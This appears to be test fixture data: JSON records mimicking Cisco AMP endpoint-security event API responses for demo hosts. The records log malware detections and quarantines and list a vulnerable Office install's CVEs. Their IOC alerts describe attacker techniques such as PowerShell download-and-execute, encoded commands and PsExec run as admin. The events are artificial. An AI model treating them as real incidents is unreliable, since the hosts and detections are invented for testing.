+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. 
In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?
vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 